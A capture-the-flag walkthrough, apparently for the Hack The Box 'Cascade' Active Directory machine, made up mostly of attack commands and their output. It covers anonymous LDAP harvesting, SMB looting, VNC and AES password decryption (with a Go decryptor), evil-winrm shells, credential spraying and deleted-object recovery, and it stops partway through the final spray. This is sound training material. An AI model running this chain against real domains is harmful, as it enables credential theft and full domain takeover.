Reconnaissance
Run a port scan with nmap. Kerberos, LDAP, SMB and WinRM all on one host means this is the domain controller for cascade.local.
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-02-27 00:20:03Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49167/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
enum4linux returns the domain user list, including two service accounts (arksvc and BackupSvc) alongside the personal accounts.
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
In the ldapsearch output, Ryan Thompson's entry carries a non-standard attribute, cascadeLegacyPwd, whose value is a Base64-encoded password. Note that this is an anonymous bind (-x with no -D), so anyone who can reach port 389 can read it.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ ldapsearch -H ldap://10.129.22.181 -x -b "DC=cascade,DC=local"
---snip---
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
Decode it.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ echo 'clk0bjVldmE=' | base64 -d
rY4n5eva
Check SMB with the recovered credentials.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ crackmapexec smb 10.129.22.181 -u r.thompson -p rY4n5eva --shares
SMB         10.129.22.181   445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.129.22.181   445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva
SMB         10.129.22.181   445    CASC-DC1         [+] Enumerated shares
SMB         10.129.22.181   445    CASC-DC1         Share           Permissions     Remark
SMB         10.129.22.181   445    CASC-DC1         -----           -----------     ------
SMB         10.129.22.181   445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.129.22.181   445    CASC-DC1         Audit$
SMB         10.129.22.181   445    CASC-DC1         C$                              Default share
SMB         10.129.22.181   445    CASC-DC1         Data            READ
SMB         10.129.22.181   445    CASC-DC1         IPC$                            Remote IPC
SMB         10.129.22.181   445    CASC-DC1         NETLOGON        READ            Logon server share
SMB         10.129.22.181   445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.129.22.181   445    CASC-DC1         SYSVOL          READ            Logon server share
Of the shares listed above, connect to Data. It contains several folders, so download everything recursively.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ smbclient //10.129.22.181/data -U 'cascade/r.thompson'
Password for [CASCADE\r.thompson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 12:27:34 2020
.. D 0 Mon Jan 27 12:27:34 2020
Contractors D 0 Mon Jan 13 10:45:11 2020
Finance D 0 Mon Jan 13 10:45:06 2020
IT D 0 Wed Jan 29 03:04:51 2020
Production D 0 Mon Jan 13 10:45:18 2020
Temps D 0 Mon Jan 13 10:45:15 2020
6553343 blocks of size 4096. 1624839 blocks available
smb: \> mask ""
smb: \> resurce ON
resurce: command not found
smb: \> recurce ON
recurce: command not found
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as IT/Email Archives/Meeting_Notes_June_2018.html (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log (1.8 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as IT/Logs/DCs/dcdiag.log (6.5 KiloBytes/sec) (average 4.1 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as IT/Temp/s.smith/VNC Install.reg (3.6 KiloBytes/sec) (average 4.0 KiloBytes/sec)
smb: \>
Account information turns up in the files that were retrieved.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ find . -type f
./rustscan.txt
./IT/Temp/s.smith/VNC Install.reg
./IT/Email Archives/Meeting_Notes_June_2018.html
./IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
./IT/Logs/DCs/dcdiag.log
./users.txt
./data
./vnc_enc_pass
./ldap-result
The meeting notes mention an account named TempAdmin, and state that it shares its password with the normal admin account.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ cat "./IT/Email Archives/Meeting_Notes_June_2018.html"
---snip---
perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).
The TightVNC registry export left in s.smith's Temp folder contains an encrypted password (the "Password" value).
┌──(kali㉿kali)-[~/htb/cascade]
└─$ cat "./IT/Temp/s.smith/VNC Install.reg"
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
The VNC password is recovered as follows:
- convert the hex bytes to Base64
- decode the Base64 back into the raw 8-byte encrypted blob and write it to a file
- run a VNC password decryption tool on that file
(The Base64 round trip only serves to get the bytes into a file; the echo output could have been redirected straight into the file instead.)
┌──(kali㉿kali)-[~/htb/cascade]
└─$ echo -n -e '\x6b\xcf\x2a\x4b\x6e\x5a\xca\x0f' | base64
a88qS25ayg8=
┌──(kali㉿kali)-[~/htb/cascade]
└─$ echo "a88qS25ayg8=" | base64 -d > vncpasshash
┌──(kali㉿kali)-[~/htb/cascade]
└─$ cat vncpasshash
k *KnZ
Fetching the vncpassword decryption tool
┌──(kali㉿kali)-[~/opt]
└─$ git clone https://github.com/jeroennijhof/vncpwd.git
Cloning into 'vncpwd'...
remote: Enumerating objects: 28, done.
remote: Total 28 (delta 0), reused 0 (delta 0), pack-reused 28 (from 1)
Receiving objects: 100% (28/28), 22.15 KiB | 7.38 MiB/s, done.
Resolving deltas: 100% (9/9), done.
┌──(kali㉿kali)-[~/opt]
└─$ cd vncpwd
┌──(kali㉿kali)-[~/opt/vncpwd]
└─$ make
gcc -Wall -g -o vncpwd vncpwd.c d3des.c
d3des.c: In function ‘deskey’:
d3des.c:70:6: warning: old-style function defin
(A large number of warnings is printed, but they are compiler warnings about old-style function definitions; the build succeeds.)
┌──(kali㉿kali)-[~/opt/vncpwd]
└─$ ./vncpwd ./vncpasshash Password: sT333ve2
Obtaining user.txt
Of the credentials gathered so far, check which are valid for WinRM.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ crackmapexec winrm 10.129.22.181 -u users.txt -p passwords.txt --continue-on-success
SMB         10.129.22.181   5985   CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.129.22.181   5985   CASC-DC1         [*] http://10.129.22.181:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.22.181   5985   CASC-DC1         [-] cascade.local\CascGuest:rY4n5eva
WINRM       10.129.22.181   5985   CASC-DC1         [-] cascade.local\CascGuest:sT333ve2
WINRM       10.129.22.181   5985   CASC-DC1         [-] cascade.local\arksvc:rY4n5eva
WINRM       10.129.22.181   5985   CASC-DC1         [-] cascade.local\arksvc:sT333ve2
WINRM       10.129.22.181   5985   CASC-DC1         [-] cascade.local\s.smith:rY4n5eva
WINRM       10.129.22.181   5985   CASC-DC1         [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
(The same CryptographyDeprecationWarning is printed before every attempt; the repeats are omitted here.)
Logging in as s.smith yields user.txt.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ evil-winrm -i 10.129.22.181 -u s.smith -p 'sT333ve2'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>
Privilege escalation
Access Audit$ as s.smith. The DB folder contains a file named Audit.db.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ smbclient //10.129.22.181/Audit$ -U 'cascade/s.smith'
Password for [CASCADE\s.smith]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jan 30 03:01:26 2020
.. D 0 Thu Jan 30 03:01:26 2020
CascAudit.exe An 13312 Wed Jan 29 06:46:51 2020
CascCrypto.dll An 12288 Thu Jan 30 03:00:20 2020
DB D 0 Wed Jan 29 06:40:59 2020
RunAudit.bat A 45 Wed Jan 29 08:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 15:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 15:38:38 2019
x64 D 0 Mon Jan 27 07:25:27 2020
x86 D 0 Mon Jan 27 07:25:27 2020
6553343 blocks of size 4096. 1624773 blocks available
smb: \> cd DB
smb: \DB\> ls
. D 0 Wed Jan 29 06:40:59 2020
.. D 0 Wed Jan 29 06:40:59 2020
Audit.db An 24576 Wed Jan 29 06:39:24 2020
6553343 blocks of size 4096. 1625031 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (22.2 KiloBytes/sec) (average 22.2 KiloBytes/sec)
smb: \DB\>
Examine the downloaded file. It is a SQLite database, and its Ldap table holds credentials for ArkSvc.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60
┌──(kali㉿kali)-[~/htb/cascade]
└─$ sqlite3
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> attach "Audit.db" as db1;
sqlite> .tables
db1.DeletedUserAudit db1.Ldap db1.Misc
sqlite> select * from db1.ldap
...> ;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from db1.ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite>
The password looks Base64-encoded, but decoding it yields binary rather than a readable string, so it is encrypted, not merely encoded.
┌──(kali㉿kali)-[~]
└─$ echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d
������D�|zC�;
Examine CascCrypto.dll, retrieved from the Audit$ share, in dnSpy.
The IV is visible in it.

Examine CascAudit.exe in dnSpy as well.

The exe calls a function in the DLL, passing it the text to decrypt and the key. Between the two binaries, everything needed for AES decryption is present:
Key: the string passed as the argument
IV (initialization vector): defined in the DLL
Mode (cipher mode): specified in the exe
Decrypt the value from Audit.db using this information.
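To make concrete what the decryption routine reconstructed above amounts to, here is an added example in Go (standard library only); it is not code from the original post or from CascCrypto.dll. It reproduces the scheme as described: Base64 ciphertext from Audit.db, a caller-supplied key, a fixed IV and AES in CBC mode, and it assumes PKCS7 padding, the .NET SymmetricAlgorithm default, which should be checked against what dnSpy shows in the exe. The key and IV in main() are placeholders (this page does not reproduce the real values; read them out of CascAudit.exe and CascCrypto.dll with dnSpy), and the function names are my own. EncryptLegacyPwd exists only so the decryptor can be self-checked.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// DecryptLegacyPwd mirrors the pattern the decompiled binaries describe:
// a Base64 ciphertext (Audit.db), a key string handed in by the caller
// (CascAudit.exe), a fixed IV (CascCrypto.dll), AES-CBC with PKCS7
// padding (assumed: the .NET SymmetricAlgorithm defaults). Key and IV
// must both be 16 bytes for AES-128.
func DecryptLegacyPwd(b64 string, key, iv []byte) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(iv) != aes.BlockSize || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("IV or ciphertext length is not a multiple of the AES block size")
	}
	block, err := aes.NewCipher(key) // rejects keys that are not 16, 24 or 32 bytes
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pt, err = pkcs7Unpad(pt)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

// EncryptLegacyPwd is the forward direction, used here only to build a
// self-contained check of the decryptor with constructed values.
func EncryptLegacyPwd(plain string, key, iv []byte) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pt := pkcs7Pad([]byte(plain))
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(ct), nil
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	for i := 0; i < n; i++ {
		b = append(b, byte(n))
	}
	return b
}

// pkcs7Unpad rejects malformed padding instead of returning garbage,
// which is what a wrong key or IV produces.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 {
		return nil, errors.New("empty plaintext")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad padding: wrong key or IV?")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding: wrong key or IV?")
		}
	}
	return b[:len(b)-n], nil
}

func main() {
	// Ciphertext from the Ldap table of Audit.db (shown above).
	const arkSvcCiphertext = "BQO5l5Kj9MdErXx6Q6AGOw=="
	// Placeholders: substitute the key string CascAudit.exe passes and the
	// IV defined in CascCrypto.dll, as read out with dnSpy.
	key := []byte("0123456789abcdef")
	iv := []byte("fedcba9876543210")
	pw, err := DecryptLegacyPwd(arkSvcCiphertext, key, iv)
	if err != nil {
		fmt.Println("decryption failed:", err) // expected with the placeholder key/IV
		return
	}
	fmt.Println("ArkSvc password:", pw)
}
```

The padding check is what tells a wrong key or IV apart from a correct one: with the real values the 16-byte ciphertext decrypts to a short UTF-8 string plus valid PKCS7 bytes, with anything else it almost always fails the check.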

Log in over WinRM as ArkSvc with the recovered password.

arksvc is a member of the AD Recycle Bin group.
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 4:18:20 PM
Password expires Never
Password changeable 1/9/2020 4:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 9:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\arksvc\Documents>
The AD Recycle Bin feature retains deleted Active Directory objects, with their attributes, so they can be restored; membership in this group lets arksvc read them. Listing the deleted objects reveals a deleted TempAdmin account that still carries a cascadeLegacyPwd attribute.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
CN : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codePage : 0
countryCode : 0
Created : 1/9/2020 7:30:19 PM
createTimeStamp : 1/9/2020 7:30:19 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instanceType : 4
isCriticalSystemObject : False
isDeleted : True
LastKnownParent : OU=Computers,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
localPolicyFlags : 0
logonCount : 0
Modified : 1/28/2020 6:08:35 PM
modifyTimeStamp : 1/28/2020 6:08:35 PM
msDS-LastKnownRDN : CASC-WS1
Name : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : computer
ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1108
primaryGroupID : 515
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132230718192147073
sAMAccountName : CASC-WS1$
sDRightsEffective : 0
userAccountControl : 4128
uSNChanged : 245849
uSNCreated : 24603
whenChanged : 1/28/2020 6:08:35 PM
whenCreated : 1/9/2020 7:30:19 PM
CanonicalName : cascade.local/Deleted Objects/Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
CN : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
Created : 1/13/2020 5:21:53 PM
createTimeStamp : 1/13/2020 5:21:53 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 9:35:46 PM, 1/17/2020 9:32:57 PM, 1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM...}
groupType : -2147483644
instanceType : 4
isDeleted : True
LastKnownParent : OU=Groups,OU=UK,DC=cascade,DC=local
Modified : 1/28/2020 6:07:55 PM
modifyTimeStamp : 1/28/2020 6:07:55 PM
msDS-LastKnownRDN : Scheduled Tasks
Name : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : group
ObjectGUID : 13375728-5ddb-4137-b8b8-b9041d1d3fd2
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1131
ProtectedFromAccidentalDeletion : False
sAMAccountName : Scheduled Tasks
sDRightsEffective : 0
uSNChanged : 245848
uSNCreated : 114790
whenChanged : 1/28/2020 6:07:55 PM
whenCreated : 1/13/2020 5:21:53 PM
CanonicalName : cascade.local/Deleted Objects/{A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
CN : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
Created : 1/26/2020 2:34:30 AM
createTimeStamp : 1/26/2020 2:34:30 AM
Deleted : True
Description :
DisplayName : Block Potato
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
flags : 0
gPCFileSysPath : \\cascade.local\SysVol\cascade.local\Policies\{A403B701-A528-4685-A816-FDEE32BDDCBA}
gPCFunctionalityVersion : 2
gPCMachineExtensionNames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}]
instanceType : 4
isDeleted : True
LastKnownParent : CN=Policies,CN=System,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : {A403B701-A528-4685-A816-FDEE32BDDCBA}
Name : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : groupPolicyContainer
ObjectGUID : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196701
uSNCreated : 196688
versionNumber : 2
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:30 AM
CanonicalName : cascade.local/Deleted Objects/Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
CN : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : Machine
Name : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 93c23674-e411-400b-bb9f-c0340bda5a34
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196699
uSNCreated : 196689
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
CanonicalName : cascade.local/Deleted Objects/User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
CN : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : User
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Base64-decode it.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ echo 'YmFDVDNyMWFOMDBkbGVz' | base64 --decode
baCT3r1aN00dles
The meeting notes said TempAdmin's password was the same as the normal admin account's, so this should be Administrator's password. Spraying it over the user list confirms it.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ crackmapexec smb 10.129.41.255 -u users.txt -p baCT3r1aN00dles
